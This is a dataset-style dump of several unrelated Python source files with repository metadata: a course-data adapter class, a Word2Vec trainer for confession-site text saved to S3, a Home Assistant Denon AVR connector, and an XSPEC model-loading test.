self.id = j_data["id"]
self.name = j_data["name"]
self.uuid = j_data["uuid"]
self.course_code_full = j_data["course_code"]
course_code_fields = self.course_code_full.split("_")
self.course_no = course_code_fields[0]
self.section = course_code_fields[1]
self.year = course_code_fields[2]
self.semester = course_code_fields[3][0]
def to_json(self):
result = {}
for f in Course._field_list:
result[f] = getattr(self, f)
return result
@classmethod
def set_context(cls, context):
cls._context = context
@classmethod
def get_courses(cls, role=None):
res = cw_adapter.Adapter.set_context(cls._context)
res = cw_adapter.Adapter.get_courses(role=role)
if res is not None and len(res) > 0:
result = []
for j_data in res:
result.append(Course(cls._context, j_data))
else:
result = None
return result
@classmethod
def get_course(cls, course_id):
res = cw_adapter.Adapter.set_context(cls._context)
res = cw_adapter.Adapter.get_courses(course_id=course_id)
if res is not None and len(res) > 0:
res_in = res[0]
result = Course(cls._context, res_in)
else:
result = None
return result
def get_students(self):
res = cw_adapter.Adapter.set_context(self._context)
res = cw_adapter.Adapter.get_students(self.id)
if res[0] == 200:
result = []
for j_data in res[1]:
result.append(Student(self._context, j_data))
else:
result = None
return result
|
[
"donff2@aol.com"
] |
donff2@aol.com
|
8c626ab93dbf410bba8151b8cdd660481d96c411
|
a2c575fe2cf4afa40ec2adb8d5b98ec47693665b
|
/thread_api/model_builder.py
|
1408f69c6ff601cbc6c4b8fa998e7f5224c3adaf
|
[] |
no_license
|
cosmicBboy/confesh-bots
|
b530ba866fee5d276a8428670f2b2fb3a3f1ca3b
|
e1115a7c3f3cfb13d5b2e185c0b9410ccc09f5e4
|
refs/heads/master
| 2021-03-19T08:28:25.579876
| 2018-04-12T20:13:05
| 2018-04-12T20:13:05
| 44,482,435
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,796
|
py
|
'''Module for Building a Model
Train a Word2Vec Model based on secret and comment text on www.confesh.com
1. Read secret and comment text
2. Train a Word2Vec model
3. Serialize model to S3
'''
import logging
import pandas as pd
import mongo_creds as creds
import json
import sys
import smart_open as so
from collections import OrderedDict
from argparse import ArgumentParser
from gensim.models import Word2Vec
from stream_mongo import MongoStreamer
from preprocessor import TextPreprocessor
from s3_utils import create_model_key
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s',
level=logging.INFO, stream=sys.stdout)
tp = TextPreprocessor()
class Word2VecModelBuilder(object):
def __init__(self, params):
self.model = Word2Vec
self.params = params
def fit(self, train_docs):
token_list = [tp.preprocess(d['text']) for d in train_docs]
self.model = self.model(token_list, **self.params)
def save_model(self, model_name, document_ids):
s3_keys = self._get_s3_keys(model_name)
self.model.save(s3_keys['model'])
with so.smart_open(s3_keys['params'], 'wb') as fout:
fout.write(json.dumps(self.params, sort_keys=True))
with so.smart_open(s3_keys['doc_ids'], 'wb') as fout:
for i in document_ids:
fout.write(i + '\n')
def load_model(self, model_name):
s3_keys = self._get_s3_keys(model_name)
self.model = self.model.load(s3_keys['model'])
def _get_s3_keys(self, model_name):
return {
'model': create_model_key(model_name, 'model', 'w2v'),
'params': create_model_key(model_name, 'params', 'json'),
'doc_ids': create_model_key(model_name, 'doc_ids', 'txt')
}
|
[
"niels.bantilan@gmail.com"
] |
niels.bantilan@gmail.com
|
1a95ee42312d01afa32e915af2536f8f124984c7
|
2c74bb301f1ed83b79254944183ac5a18a639fdf
|
/homeassistant/components/denonavr/receiver.py
|
28969d2579256202064fcda1e7a514fa6498a181
|
[
"Apache-2.0"
] |
permissive
|
Adminiuga/home-assistant
|
5bec93007ddac1a268cc359bf7e48530c5f73b38
|
dcf68d768e4f628d038f1fdd6e40bad713fbc222
|
refs/heads/dev
| 2023-02-22T22:03:31.013931
| 2022-11-09T00:27:20
| 2022-11-09T00:27:20
| 123,929,062
| 5
| 4
|
Apache-2.0
| 2023-02-22T06:14:31
| 2018-03-05T14:11:09
|
Python
|
UTF-8
|
Python
| false
| false
| 2,668
|
py
|
"""Code to handle a DenonAVR receiver."""
from __future__ import annotations
from collections.abc import Callable
import logging
from denonavr import DenonAVR
_LOGGER = logging.getLogger(__name__)
class ConnectDenonAVR:
"""Class to async connect to a DenonAVR receiver."""
def __init__(
self,
host: str,
timeout: float,
show_all_inputs: bool,
zone2: bool,
zone3: bool,
async_client_getter: Callable,
) -> None:
"""Initialize the class."""
self._async_client_getter = async_client_getter
self._receiver: DenonAVR | None = None
self._host = host
self._show_all_inputs = show_all_inputs
self._timeout = timeout
self._zones: dict[str, str | None] = {}
if zone2:
self._zones["Zone2"] = None
if zone3:
self._zones["Zone3"] = None
@property
def receiver(self) -> DenonAVR | None:
"""Return the class containing all connections to the receiver."""
return self._receiver
async def async_connect_receiver(self) -> bool:
"""Connect to the DenonAVR receiver."""
await self.async_init_receiver_class()
assert self._receiver
if (
self._receiver.manufacturer is None
or self._receiver.name is None
or self._receiver.model_name is None
or self._receiver.receiver_type is None
):
_LOGGER.error(
"Missing receiver information: manufacturer '%s', name '%s', model '%s', type '%s'",
self._receiver.manufacturer,
self._receiver.name,
self._receiver.model_name,
self._receiver.receiver_type,
)
return False
_LOGGER.debug(
"%s receiver %s at host %s connected, model %s, serial %s, type %s",
self._receiver.manufacturer,
self._receiver.name,
self._receiver.host,
self._receiver.model_name,
self._receiver.serial_number,
self._receiver.receiver_type,
)
return True
async def async_init_receiver_class(self) -> None:
"""Initialize the DenonAVR class asynchronously."""
receiver = DenonAVR(
host=self._host,
show_all_inputs=self._show_all_inputs,
timeout=self._timeout,
add_zones=self._zones,
)
# Use httpx.AsyncClient getter provided by Home Assistant
receiver.set_async_client_getter(self._async_client_getter)
await receiver.async_setup()
self._receiver = receiver
|
[
"noreply@github.com"
] |
Adminiuga.noreply@github.com
|
8bfbca51d0b37ee289502c1fbaaf5efe3b2fda3e
|
debffca14a39dbeaf6af2f1b73ea530913e2cdad
|
/astromodels/tests/test_load_xspec_models.py
|
e10e14154daf319d6f29bd8409ebbdc01001fd9b
|
[
"BSD-3-Clause"
] |
permissive
|
BjoernBiltzinger/astromodels
|
6986695abfc4510a62254854fd0977b1e96e192f
|
d94a3d3bc607def2b5e3cd145c3922e0a00a7b15
|
refs/heads/master
| 2022-11-03T19:28:16.949036
| 2019-03-12T17:05:59
| 2019-03-12T17:05:59
| 175,420,543
| 0
| 0
|
BSD-3-Clause
| 2019-03-13T12:53:03
| 2019-03-13T12:53:03
| null |
UTF-8
|
Python
| false
| false
| 641
|
py
|
import pytest
import astropy.units as u
try:
from astromodels.xspec import *
except:
has_XSPEC = False
else:
has_XSPEC = True
# This defines a decorator which can be applied to single tests to
# skip them if the condition is not met
skip_if_xspec_is_not_available = pytest.mark.skipif(not has_XSPEC,
reason="XSPEC not available")
@skip_if_xspec_is_not_available
def test_xspec_load():
# no need to do anything really
s = XS_phabs() * XS_powerlaw() + XS_bbody()
print(s(1.0))
s.set_units(u.keV, 1 / (u.keV * u.cm**2 * u.s))
print(s(1.0 * u.keV))
|
[
"giacomo.vianello@gmail.com"
] |
giacomo.vianello@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.